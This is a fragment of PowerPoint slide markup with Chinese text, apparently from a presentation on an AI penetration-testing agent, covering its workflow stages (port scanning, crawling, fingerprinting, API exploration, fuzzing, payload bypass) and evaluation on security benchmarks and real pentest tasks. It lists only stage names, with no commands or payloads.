              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1941830" y="5384165"/>
            <a:ext cx="2357755" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>评估</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>标准</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104900" y="5208270"/>
            <a:ext cx="720000" cy="720000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="文本框 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="588010" y="1084580"/>
            <a:ext cx="7560945"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上半场：算力与数据驱动的基础设施建设</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“更大</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更多</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更快”</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8" name="文本框 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="588010" y="3685540"/>
            <a:ext cx="825881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下半场：架构与评估驱动的价值实现</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“更准</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更稳</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更</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可用”</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9" name="文本框 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3766185" y="1934528"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>训练更大参数规模的模型，追求更强的涌现能力</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0" i="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="文本框 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3766185" y="2757805"/>
            <a:ext cx="5508625" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>收集海量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>多模态数据，为模型预训练提供知识基础</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0" i="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="文本框 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3766185" y="4451033"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>将基础模型的能力精准导向复杂的垂域业务逻辑</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0" i="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="文本框 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3766185" y="5410518"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>衡量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>AI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>在真实场景中的实效性与成本效益</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0" i="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="文本框 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10234930" y="2129790"/>
            <a:ext cx="1291590" cy="953135"/>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通用</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AI</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大脑</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6" name="文本框 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10264140" y="4788535"/>
            <a:ext cx="1841500" cy="953135"/>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垂域专用</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4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9457690" y="2239645"/>
            <a:ext cx="540000" cy="540000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9484360" y="4991100"/>
            <a:ext cx="540000" cy="540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架构设计</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像攻击者</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一样思考</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 name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381635" y="1146175"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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URL-&gt;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攻击面发现</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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381635" y="2974340"/>
            <a:ext cx="40640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页面</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业务逻辑</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理解</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3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381635" y="4820285"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pP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API-&gt;</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漏洞批量</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测试</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5" name="圆角矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2827655" y="1210310"/>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端口扫描</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="圆角矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2827655" y="1788795"/>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页面爬取</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="圆角矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2827655" y="2367280"/>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指纹识别</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="圆角矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2827655" y="3072765"/>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sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>爬取</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="圆角矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2827655" y="3651250"/>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en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>探索</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="圆角矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2827655" y="4229735"/>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登录爆破</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="圆角矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2827655" y="4935220"/>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参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>Fuzz</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="圆角矩形 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2827655" y="5513705"/>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令牌替换</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="圆角矩形 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2827655" y="6092190"/>
            <a:ext cx="1617980" cy="367665"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:srgbClr val="FFFFFF"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:srgbClr val="FFFFFF"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>载荷绕过</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="圆角矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381635" y="1110615"/>
            <a:ext cx="9124950" cy="1739265"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="5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圆角矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381635" y="2956560"/>
            <a:ext cx="9124950" cy="1739265"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="5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圆角矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381635" y="4802505"/>
            <a:ext cx="9124950" cy="1739265"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>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8" name="肘形连接符 17"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="5" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="702945" y="1972945"/>
            <a:ext cx="2124075" cy="991870"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 100029"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="31750">
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="accent1">
                    <a:hueOff val="-4200000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent1"/>
                </a:gs>
              </a:gsLst>
            </a:gradFill>
            <a:prstDash val="sysDash"/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:srgbClr val="FFFFFF"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:srgbClr val="FFFFFF"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:srgbClr val="FFFFFF"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="肘形连接符 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="703580" y="3830955"/>
            <a:ext cx="2124075" cy="991870"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 100029"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="31750">
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="accent1">
                    <a:hueOff val="-4200000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent1"/>
                </a:gs>
              </a:gsLst>
            </a:gradFill>
            <a:prstDash val="sysDash"/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:srgbClr val="FFFFFF"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:srgbClr val="FFFFFF"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:srgbClr val="FFFFFF"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="文本框 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4877435" y="1770380"/>
            <a:ext cx="446786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从单一</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URL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发现尽可能多的资产（页面）</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2" name="文本框 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4877435" y="3654425"/>
            <a:ext cx="40640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从单一页面</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发现尽可能多的信息</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（API）</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3" name="文本框 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4877435" y="5538470"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:sp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从单一</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API </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发现尽可能多的缺陷（</a:t>
            </a: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评估标准</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架构的设计锚</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点</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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381635" y="1033145"/>
            <a:ext cx="7444740" cy="1847850"/>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通用基准</a:t>
            </a:r>
            <a:r>
              <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a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>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MMLU（15908</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题</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Computer security（116</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题</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3" name="图片 2" descr="/private/var/folders/s0/0lbcm4850jl12p1lk6b5mn380000gn/T/com.kingsoft.wpsoffice.mac/photoeditapp/20251124134153/temp.pngtemp"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="431165" y="1734185"/>
            <a:ext cx="8092440" cy="917575"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 11626"/>
            </a:avLst>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2205990" y="3604895"/>
            <a:ext cx="2084070" cy="373380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <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真实渗透测试任务</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2499995" y="2849245"/>
            <a:ext cx="720000" cy="720000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
